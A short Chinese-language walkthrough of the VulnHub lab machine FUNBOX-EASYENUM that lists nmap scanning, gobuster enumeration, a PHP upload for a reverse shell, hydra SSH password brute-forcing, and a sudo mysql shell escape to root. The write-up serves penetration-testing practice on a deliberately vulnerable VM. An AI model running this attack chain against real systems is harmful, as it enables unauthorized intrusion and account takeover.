Vulnhub:FUNBOX-EASYENUM靶机

1.浏览器输入目标靶机IP地址浏览网页
Vulnhub:FUNBOX-EASYENUM靶机
2.端口扫描

nmap -p- 192.168.31.128
nmap -sC  -sV -p 22,80 192.168.31.128

Vulnhub:FUNBOX-EASYENUM靶机
3.目录枚举
目录枚举的时候找到了一个有意思的mini.php目录

gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt

Vulnhub:FUNBOX-EASYENUM靶机
4.在浏览器打开mini.php,经过测试可以上传.php文件
Vulnhub:FUNBOX-EASYENUM靶机
上传php文件,反弹shell
Vulnhub:FUNBOX-EASYENUM靶机
5.在/home目录下发现存在五个用户,使用暴力破解得出goat用户的SSH登录密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.31.128  ssh 

Vulnhub:FUNBOX-EASYENUM靶机

Vulnhub:FUNBOX-EASYENUM靶机
6.ssh登录系统之后,使用sudo -l命令发现可以使用mysql提权
使用提权语句 mysql -e '\! /bin/bash'成功获取root权限
Vulnhub:FUNBOX-EASYENUM靶机
最后,谢谢大家伙百忙之中观看我的文章。

上一篇:VulnHub靶场篇8-IMF:1


下一篇:vulnhub靶机实战:DC-2